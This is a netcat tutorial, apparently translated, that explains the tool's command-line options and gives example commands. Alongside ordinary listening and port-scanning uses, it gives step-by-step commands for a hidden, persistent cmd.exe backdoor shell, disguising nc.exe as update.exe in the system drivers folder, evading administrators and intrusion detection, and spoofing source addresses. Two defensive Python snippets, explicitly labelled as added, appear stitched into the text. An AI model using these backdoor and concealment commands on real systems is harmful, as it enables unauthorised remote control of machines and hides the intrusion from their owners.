Introduction to the use of netcat

Source: Internet
Author: User

NC is short for netcat. It can establish and accept TCP and User Datagram Protocol (UDP) connections, and it can read and write data on those connections until they are closed. It can interact with an application-layer network application or service by hand or from a script. Strictly speaking, netcat does not create UDP connections, because UDP is a connectionless protocol. Netcat has no graphical interface; it is a very rough, very primitive tool.

The command line for NC

The basic command-line form is nc [options] host ports, where host is the hostname or IP address to scan and ports is either a single port, a range of ports (written m-n), or a series of single ports separated by spaces.

-d is only useful on Windows. It lets netcat run in stealth mode, detached from the MS-DOS command prompt, so nc does not need to keep a command window open to run in listening mode. It also helps hackers hide a listening netcat instance so that the system administrator does not notice it.

-e If netcat was compiled with the GAPING_SECURITY_HOLE option, a listening netcat will execute the given program whenever someone connects to the port it is listening on in the background, and a client netcat will pipe its I/O to another netcat instance listening elsewhere. This option is dangerous; do not use it unless you understand nc well, or at least know what you are doing. It is a quick and easy way to set up a backdoor shell on a system.

-i delay interval, the time nc waits between two sends. For example, when a file is piped into nc, this is the number of seconds nc waits before transmitting the next line of input; when nc is used against several ports on one host, it is the number of seconds nc waits before moving on to the next port. This lets hackers be more covert when transmitting data or attacking a service, and it can also help a port scan go unnoticed by intrusion detection systems and system administrators.

-g This option is deceptive. nc supports loose source routing. You can specify up to eight -g options on the command line to force nc's traffic through specific IP addresses; combined with a spoofed source IP address, this can be used to get traffic past a firewall filter or host allow list, in the hope of receiving a response from the host.

-G This option lets the user specify which address in the routing list given by the -g options is the current next hop. Because an IPv4 address is 4 bytes, this parameter is always a multiple of 4: 4 means the first IP address in the routing list, 8 the second, and so on. This is quite useful for forging part of the source-routing table. It helps conceal your location when spoofing with source routing, but you will not necessarily receive response messages, because the responses are routed back through the spoofed IP addresses.

-l This option switches nc into listening mode. It must be used with the -p option, which tells nc which TCP port to bind and wait for incoming connections on. If the -u option is also given, a UDP port is used instead of a TCP port.

-L This option exists in the Windows version: when a connection is closed, the listener is restarted with the same command-line options, so even after the initial connection has ended nc can accept a new connection without user intervention. As with -l, it must be used together with -p.

-n This option tells nc not to do any hostname lookups.

-o hexfile performs a hexadecimal dump of the data and stores it in hexfile. The command nc -o hexfile records traffic in both directions, and each line begins with "<" or ">" to mark incoming and outgoing data respectively. There is also a variant of this command that captures a hex dump of incoming data only.
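The "<" / ">" dump that -o writes is what a defender is most likely to have to read back after the fact. The following Python is an added example, not code from this page or from netcat itself: it parses a dump in that layout (direction marker, eight-digit hex offset, up to 16 hex bytes, then a "#" and the ASCII column; the exact column layout is assumed from netcat 1.10's output) and reassembles each direction into bytes, refusing dumps whose offsets do not line up. The dump text is constructed.

```python
import re

# One dump line: direction marker, 8-hex-digit offset, hex bytes, then "#" and
# the ASCII column.  This layout is assumed from netcat's -o output.
LINE_RE = re.compile(
    r"^(?P<dir>[<>]) (?P<off>[0-9a-fA-F]{8}) (?P<hex>(?:[0-9a-fA-F]{2} ?)+?)\s*#"
)

def parse_hexdump(text: str) -> dict[str, bytes]:
    """Reassemble a two-direction nc -o dump into one byte string per side.

    '<' lines are data received from the network, '>' lines data sent to it.
    Lines that do not match the layout are skipped; offsets are checked so a
    truncated or reordered dump is reported rather than silently joined.
    """
    streams = {"<": bytearray(), ">": bytearray()}
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        direction, offset = m.group("dir"), int(m.group("off"), 16)
        if offset != len(streams[direction]):
            raise ValueError(f"line {lineno}: offset {offset:#x} breaks the stream")
        streams[direction] += bytes.fromhex(m.group("hex"))
    return {d: bytes(b) for d, b in streams.items()}

# Constructed sample: an HTTP request sent (>) and the reply received (<).
SAMPLE_DUMP = """\
> 00000000 47 45 54 20 2f 20 48 54 54 50 2f 31 2e 30 0d 0a # GET / HTTP/1.0..
> 00000010 0d 0a                                           # ..
< 00000000 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d # HTTP/1.0 200 OK.
< 00000010 0a 0d 0a 68 69 0a                               # ...hi.
"""

if __name__ == "__main__":
    for side, data in parse_hexdump(SAMPLE_DUMP).items():
        print(side, data)
```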

-p lets the user specify the local port number nc should use. This parameter is required when listening mode is used via the -l or -L options. If it is not given for an outbound connection, nc, like most other TCP or UDP client programs, uses whatever port the system assigns to it.

-r This parameter makes nc choose local and remote ports at random. It is useful when using nc to gather information on a large range of ports on a system, because the shuffled order of source and destination ports does not look like a port scan. When this option is combined with the -i option and a large enough interval, the chance that a port scan goes unnoticed improves greatly.

-s Specifies the source IP address nc uses to establish a connection. This lets hackers hide their own IP address or impersonate someone else's, but to get any of the information that is routed back to the spoofed address you also need the -g source-routing option. Second, in listening mode, you can often "bind" in front of a service that is already listening, since all TCP and UDP services are bound to a port.

-t If compiled with the telnet option, nc can negotiate telnet options with a telnet server. Although the responses it gives are meaningless, this lets you see the information returned by a connection to port 23.

-u nc uses UDP instead of TCP; this works in both client and listening mode.

-v controls how much nc tells you about what it is doing. With no -v, nc spits out only the data it receives; a single -v lets you know whether there was a problem with the address it connected or bound to; a second -v (-vv) makes nc report the total amount of data the connection sent and received when it ends.

-w controls how long nc waits before giving up on a connection. It also tells nc how long to wait before closing the connection and exiting once it receives an EOF (end-of-file) on standard input. This option is useful when you send commands to a remote server through nc and expect a large amount of data back (for example, sending an HTTP command to a web server to download a large file).

The specific use of NC

C:\>nc.exe -l -p 4455 -d -e cmd.exe hides a netcat back door quite well.

C:\>nc.exe -p 4455 -d -L -e cmd.exe This command lets hackers return to the system with netcat until the system administrator sees nc.exe running in Task Manager and finds the back door. It can be made more covert:

C:\>move nc.exe C:\windows\system32\drivers\update.exe

C:\>C:\windows\system32\drivers\update.exe -p 4455 -d -L -e cmd.exe

A system administrator may well give a harmless-looking program such as update.exe the benefit of the doubt, and hackers can hide the command line as well:

C:\>C:\windows\system32\drivers\update.exe

Cmd line: -l -p 4455 -d -L -e cmd.exe

C:\>
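Because the binary can be renamed and the options typed at the Cmd line: prompt, a defender cannot rely on the file name nc.exe, nor on the recorded command line alone. The following Python is an added example (not from this page or from netcat) that classifies constructed process command lines by their netcat option letters: a listener (-l or -L) combined with -e is flagged as a backdoor shell, -d marks it as detached, and the prompt-fed case is reported as "no-args" so the caller falls back to checking which process owns the listening socket.

```python
# Option letters this check keys on (from the option list above):
LISTEN = {"l", "L"}  # -l listen once; -L (Windows) re-listen after each close
EXEC, DETACH, SCAN = "e", "d", "z"  # -e run a program, -d detach, -z scan mode

def option_letters(tokens: list[str]) -> list[str]:
    """Expand '-vv' or '-lp' style tokens into single option letters."""
    letters: list[str] = []
    for tok in tokens[1:]:  # tokens[0] is the program image
        if tok.startswith("-") and len(tok) > 1 and not tok[1:].isdigit():
            letters.extend(tok[1:])
    return letters

def classify(cmdline: str) -> dict[str, object]:
    """Verdict for one logged command line: backdoor, listener, scan, other,
    or no-args.  No-args matters: Windows netcat then reads its options from
    the 'Cmd line:' prompt, so the caller must check who owns the listening
    socket instead of trusting the (renamed) image name or its arguments."""
    tokens = cmdline.split()  # assumes no quoted paths containing spaces
    opts = option_letters(tokens)
    listening = bool(LISTEN & set(opts))
    if len(tokens) <= 1:
        verdict = "no-args"
    elif listening and EXEC in opts:
        verdict = "backdoor"
    elif listening:
        verdict = "listener"
    elif SCAN in opts:
        verdict = "scan"
    else:
        verdict = "other"
    return {"verdict": verdict, "hidden": DETACH in opts, "options": opts}

# Constructed command lines, as a process-creation log might record them.
SAMPLE_CMDLINES = [
    r"C:\nc.exe -l -p 4455 -d -e cmd.exe",
    r"C:\windows\system32\drivers\update.exe -p 4455 -d -L -e cmd.exe",
    r"C:\windows\system32\drivers\update.exe",
    r"nc -v -l -p 80",
    r"nc -v -z 192.0.2.10 20-25",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        r = classify(c)
        print(f"{r['verdict']:9} hidden={r['hidden']!s:5} {c}")
```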

nc -l -p 80 listens on port 80

nc -l -p 80 >c:\log.dat listens on port 80 and logs the received data to log.dat

nc -v -l -p 80 listens on port 80 and displays connection information

nc -vv -l -p 80 listens on port 80 and displays more detailed connection information

nc -l -p 80 -t -e cmd.exe listens for inbound connections on local port 80 and attaches cmd.exe to that port, so that when someone connects, cmd.exe answers in telnet form. Of course, this is best used on a compromised host (a "broiler") that you already control.

nc -v IP port scans a single port on IP

nc -v -z IP port-port scans a range of TCP ports on IP

nc -v -z -u IP port-port scans a range of UDP ports on IP
